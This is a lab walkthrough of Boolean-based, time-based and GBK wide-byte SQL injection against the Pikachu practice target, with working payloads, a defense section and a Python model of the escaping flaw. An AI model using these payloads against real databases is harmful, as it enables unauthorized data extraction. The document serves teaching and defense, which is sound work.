pikachu: Boolean-based, time-based and wide-byte blind injection

Table of Contents

Boolean-based blind injection

Time-based blind injection

Wide byte injection


Boolean-based blind injection

Error messages are suppressed, and the page shows only two states: correct and incorrect.

Try entering a single quote

Type it in and try

What matters most for Boolean-based injection are the value and comparison functions: length(), substr() and ascii(). substr() extracts characters from a string, and ascii() converts a character into its numeric code so the comparison can be done arithmetically. For example:

select substr(database(),1,1)>10

select ascii(substr(database(),1,1))>10

select length(database())>10

Start injecting: kobe' and ascii(substr(database(),1,1))>113#

If the content is displayed, the expression is true; otherwise it is false.

kobe' and ascii(substr(database(),1,1))=112#

kobe' and ascii(substr((select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=database() limit 0,1),1,1))<112#

Time-based blind injection

Boolean-based injection can be judged from a 0-or-1 difference in the response. In time-based blind injection nothing can be seen at all: there is no difference in the displayed output from which to tell whether the statement was executed. This is where time-based blind injection comes in.

Whatever is entered, the page immediately echoes the same error, so there is no visible difference to compare.

Use sleep()

Enter kobe' and sleep(3)

The response is delayed by 3 seconds, so a time-based SQL injection vulnerability exists.

In other words, if the guess in the following statement is correct, the response is delayed; if it is incorrect, the page echoes immediately.

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

Wide byte injection

Capture the packet after entering the injection bytes

The addslashes() function adds a backslash before single quotes and similar characters (' becomes \'), which after URL encoding is %5c%27. Our payload is [%df'], i.e. %df (anything between %81 and %fe works) placed in front of the quote, so after escaping it becomes %df%5c%27. If the database uses GBK encoding, %df%5c is treated as one wide character, and the single quote %27 escapes the escaping.

Order by field query: entering 2 is normal and entering 3 reports an error, indicating that the number of fields is 2

Union query to test the database:

Query the table name: kobe%df' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()

Query

The table name must be wrapped in single quotes, so Burp can be used to convert 'users' into concat(char(39),char(117),char(115),char(101),char(114),char(115),char(39))

Details: https://blog.csdn.net/weixin_44426869/article/details/104341863

Defense

For wide byte injection, one of the best fixes is:

(1) Use mysql_set_charset('gbk') to specify the character set

(2) Use mysql_real_escape_string to escape

The principle: the difference between mysql_real_escape_string and addslashes is that the former takes the currently configured character set into account, so the problem of e5 and 5c being joined into one wide-byte character does not occur. But how is this "current character set" determined?

It is specified with mysql_set_charset.

The two measures above are joined by AND: both are required, and neither works on its own.
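To see why the two measures have to go together, here is an added Python model (not code from the Pikachu project or the original post) of a byte-blind escaper, a charset-aware escaper, and the way a GBK-configured parser reads the escaped bytes. The names addslashes, escape_gbk, quote_terminates_literal and breaks_out are mine; the GBK byte ranges (lead 0x81-0xFE, trail 0x40-0xFE except 0x7F) and the rule that a lone lead byte is itself escaped are my simplified assumptions about how a charset-aware escaper behaves.

```python
from urllib.parse import unquote_to_bytes
ESCAPED = b"'\"\\\x00"  # bytes that addslashes() prefixes with a backslash

def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE  # first byte of a GBK wide character (assumed range)

def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0xFE and b != 0x7F  # second byte; 0x5C ('\') qualifies

def addslashes(data: bytes) -> bytes:  # byte-blind, like PHP's addslashes()
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def escape_gbk(data: bytes) -> bytes:
    """Charset-aware escaping for a GBK connection: a complete lead+trail pair is
    copied as is; a lone lead byte is escaped so it cannot swallow a backslash."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if is_gbk_lead(b) and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
            out += data[i:i + 2]  # whole wide character, copied untouched
            i += 2
            continue
        if is_gbk_lead(b) or b in ESCAPED:
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)

def quote_terminates_literal(escaped: bytes) -> bool:
    """Read escaped bytes as a GBK parser reads a quoted literal; True = broke out."""
    i = 0
    while i < len(escaped):
        b = escaped[i]
        if is_gbk_lead(b) and i + 1 < len(escaped) and is_gbk_trail(escaped[i + 1]):
            i += 2  # lead+trail is one character, even when the trail is 0x5C
        elif b == 0x5C:
            i += 2  # backslash escapes the next byte
        elif b == 0x27:
            return True
        else:
            i += 1
    return False

def breaks_out(url_fragment: str, escaper) -> bool:
    return quote_terminates_literal(escaper(unquote_to_bytes(url_fragment)))
```

With the constructed input kobe%df%27, breaks_out returns True under addslashes (the %df%5c pair is read as one character and the quote survives) and False under escape_gbk, while a plain kobe%27 is safe under both.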